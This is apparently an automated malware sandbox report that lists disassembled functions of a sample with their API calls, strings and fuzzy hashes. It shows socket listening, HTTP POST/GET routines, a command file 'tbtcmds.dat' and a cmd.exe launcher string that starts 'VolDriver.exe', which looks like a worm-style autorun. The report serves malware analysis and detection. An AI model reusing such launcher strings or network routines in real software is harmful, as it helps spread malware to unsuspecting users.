API String ID: 92872011-445461498
Opcode ID: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
Instruction ID: 675ada4a5424986e6cd9ec47b4399dcfcf89a647db31862166f89cf1cb76b4cd
Opcode Fuzzy Hash: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
Instruction Fuzzy Hash: E33178B5900218AFCB10DB60EC89FDA7778AB48301F00C5A9F609A3185DB75DAD9CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF30 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040CF42
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CF68
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CF9F
GetTickCount.KERNEL32 ref: 0040CFB4
Sleep.KERNEL32(00000001), ref: 0040CFD4
GetTickCount.KERNEL32 ref: 0040CFDA

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
Instruction ID: 1a678e6439685295adbdd864bb1f175a680e3ab9afc47d2c7bf7927640be176d
Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
Instruction Fuzzy Hash: B031FE7490020EEFCF04DFA4D988AEE77B1FF44315F108669E815A72D0D7749A90CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6E0 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON

Download Yara Rule

APIs

NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Time$QuerySecondsSince1980System
String ID:
API String ID: 1987401769-0
Opcode ID: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
Instruction ID: 71f66deb3bce6efc95a111259a7627df0bb84068fda71d22670a2dc98323c2b1
Opcode Fuzzy Hash: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
Instruction Fuzzy Hash: 4FD09E79C4010DABCB04DBE4E849CDDB77CEA44201F0086D5AD1592150EAB066588B95

Uniqueness

Uniqueness Score: -1.00%

Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0040411B

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F319 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 0040F3CA

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: cdb5871c7e4a9dfe82dcfd1a22c61253dacbf7643b9d47dc73f44391164f311f
Instruction ID: ed88f62fed3e0664d567f3517dc123a76f672f05ee508a299baa59d95eb885c2
Opcode Fuzzy Hash: cdb5871c7e4a9dfe82dcfd1a22c61253dacbf7643b9d47dc73f44391164f311f
Instruction Fuzzy Hash: 5C61C2316046129BCB39CF29D88066B73A1EB95324B68857BDC15E7ED1E738EC4AC748

Uniqueness

Uniqueness Score: -1.00%

Function 0040A120 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A13C

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: HeapsProcess
String ID:
API String ID: 1420622215-0
Opcode ID: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
Instruction ID: b83f3f2e73c8486dc3452fb2da189838b946440ea4f240f2a2f0ba60deb05fe4
Opcode Fuzzy Hash: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
Instruction Fuzzy Hash: DD01ECF4904218CADB208F14DD847A9B775AB94304F1482EAD7197A281C2781ED6CF5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A740 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7af40cfe94d130d0b405e5eb26263e5ac1a428011fc9ffc3300cb19f3f678b
Instruction ID: 555dc86a3542d35efdbad61dc8a6f814d06877572403d2e3ea9d75403d7cd939
Opcode Fuzzy Hash: ff7af40cfe94d130d0b405e5eb26263e5ac1a428011fc9ffc3300cb19f3f678b
Instruction Fuzzy Hash: 8D128CB4D00219DFCB48CF99D991AAEFBB2BF88304F24856AE415BB355D734AA01CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0DC Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
Instruction ID: ab6376a2cbfef6d77692bb4ff921bbcbfbf8d9cca3a0456804da462bb9118508
Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
Instruction Fuzzy Hash: A721C732900204EBC720EF69C88096BB7A5BF44350B4581B9DD15AB685D734FD19C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
Instruction ID: 30acf59a4b92f93f505059f31b2171fe0b1c4ce4dbffa3032f64cc39e79a13a9
Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
Instruction Fuzzy Hash: E241F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E730 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040E758
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E7A8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E7BB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F4
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E82A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E855
HttpSendRequestA.WININET(00000000,00411DE8,000000FF,00009E34), ref: 0040E87F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E8BE
memcpy.NTDLL(00000000,?,00000000), ref: 0040E910
InternetCloseHandle.WININET(00000000), ref: 0040E941
InternetCloseHandle.WININET(00000000), ref: 0040E94E
InternetCloseHandle.WININET(00000000), ref: 0040E95B

Strings

Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040E7B6
POST, xrefs: 0040E81E
<, xrefs: 0040E760

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
Instruction ID: 85fc693ee375b13e16fb66d1006c55e21916babb9bf1ea115f780426e1cf3f13
Opcode Fuzzy Hash: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
Instruction Fuzzy Hash: C6513DB5A01228ABDB66CF54CC54BDA73BCAB48705F0481E9B60DA6280D7B86FC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

PCOI, xrefs: 0040160D
ilci, xrefs: 00401630

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
Instruction ID: 6a29a2099ab565f473fc8e7e311d0e2c8013c240518d5c358219ad3f6c04db59
Opcode Fuzzy Hash: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
Instruction Fuzzy Hash: C231A675900701ABC720DF70EC48B97B7A8BF08304F048A2AF559A3691D77AF894CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE00 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040DE28
InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
memcpy.NTDLL(00000000,?,00000000), ref: 0040DFBA
InternetCloseHandle.WININET(00000000), ref: 0040DFF7
InternetCloseHandle.WININET(00000000), ref: 0040E004
InternetCloseHandle.WININET(00000000), ref: 0040E011

Strings

<, xrefs: 0040DE30
GET, xrefs: 0040DEEB

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
Instruction ID: 48cd83f5195f7f7898929b3619b8d091957442f788ca39022680675dc0c7e588
Opcode Fuzzy Hash: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
Instruction Fuzzy Hash: 51510D71941228ABDB36CB50CC55BD9B7BCAB44705F0480E9F60D6A2C1D7B96BC8CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406000 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416C40,00000000,0040BB32,006A0266,?,0040BB4E,00000000,0040CE2C,?), ref: 0040600F
memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
CloseHandle.KERNEL32(000000FF), ref: 0040623D
LeaveCriticalSection.KERNEL32(00416C40,?,?,?,?,?,?,0040BB4E,00000000,0040CE2C,?), ref: 00406248

Strings

C:\Users\user\tbtcmds.dat, xrefs: 004061C0

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID: C:\Users\user\tbtcmds.dat
API String ID: 1457358591-126538273
Opcode ID: 7e520240d61285c04f860047b94aa52bf4a239b4811b1ff9f098ba9f71f6f04c
Instruction ID: e6130a6dfe54c84fffd3ba92570c30583d1ab1b9d3ba2be6bfb3361b08162579
Opcode Fuzzy Hash: 7e520240d61285c04f860047b94aa52bf4a239b4811b1ff9f098ba9f71f6f04c
Instruction Fuzzy Hash: 9E71C0B4E002099BCB08CF94D885FEFB7B1EB58304F14816DE905BB382D679A951CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
Instruction ID: a734cc1f61c70acf9279ac5ca78d82aa64a2a4ecc5b5604f6a29b6a4ece08d42
Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
Instruction Fuzzy Hash: 89519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040E480 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
SysFreeString.OLEAUT32(00000000), ref: 0040E59F
SysFreeString.OLEAUT32(00000000), ref: 0040E5B7

Strings

device, xrefs: 0040E533
deviceType, xrefs: 0040E546

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
Instruction ID: 3069ab4536640b36b0e12cde36f3ec166fb94fe14c65d0f959ecac372860a23d
Opcode Fuzzy Hash: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
Instruction Fuzzy Hash: 9D411A74A0020AEFDB14CFD5C884BAFB7B5AF48304F108969E505A7390E778EA81CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E320 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
SysFreeString.OLEAUT32(00000000), ref: 0040E43F
SysFreeString.OLEAUT32(00000000), ref: 0040E457

Strings

service, xrefs: 0040E3D3
serviceType, xrefs: 0040E3E6

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
Instruction ID: 3ee3a309e4cad0d77f423f26d7802281532f5296dcc9ab773efb6af10bc721e7
Opcode Fuzzy Hash: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
Instruction Fuzzy Hash: 7A413BB5A0020ADFCB04DF99C884FAFB7B5BF48304F108569E504A73A0D778AE85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9b786cfb75bd2c3bd49bc3363be0eeae1962839caf469abeefe4a7505a087006
Instruction ID: a595f2b535375a145ed5326f987dfcc9cad8dea697baa589e2f3a50a699b5d5f
Opcode Fuzzy Hash: 9b786cfb75bd2c3bd49bc3363be0eeae1962839caf469abeefe4a7505a087006
Instruction Fuzzy Hash: 2A31E372200215ABC710AFB5ED8CAD7B798FF54314F04463EF54DD3280DB79A4449B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406400 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040640B
CoCreateInstance.OLE32(00412768,00000000,00000001,00412748,?), ref: 00406423
wsprintfW.USER32 ref: 00406456

Strings

/c start .\%s & start .\%s\VolDriver.exe, xrefs: 0040644A
$h@, xrefs: 00406472, 00406475
%windir%\System32\cmd.exe, xrefs: 0040645F

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

